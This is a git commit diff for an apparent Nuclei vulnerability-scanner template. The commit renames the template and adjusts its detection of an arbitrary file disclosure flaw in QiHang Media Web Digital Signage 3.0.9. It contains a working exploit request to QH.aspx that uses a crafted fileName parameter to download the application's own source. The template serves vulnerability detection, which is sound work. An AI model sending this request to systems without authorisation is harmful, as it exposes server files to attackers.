Update and rename qihang-media-web-lfi.yaml to qihang-media-lfi.yaml
parent
ea71661d79
commit
58fd372498
|
@ -1,4 +1,4 @@
|
||||||
id: qihang-media-web-lfi
|
id: qihang-media-lfi
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability
|
name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability
|
||||||
|
@ -13,16 +13,13 @@ requests:
|
||||||
- |
|
- |
|
||||||
GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
|
GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
||||||
Accept-Encoding: gzip, deflate
|
|
||||||
Accept-Language: en-US,en;q=0.9
|
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "attachment"
|
- "filename=QH.aspx"
|
||||||
- "application/zip"
|
- "application/zip"
|
||||||
part: header
|
part: header
|
||||||
condition: and
|
condition: and
|
Loading…
Reference in New Issue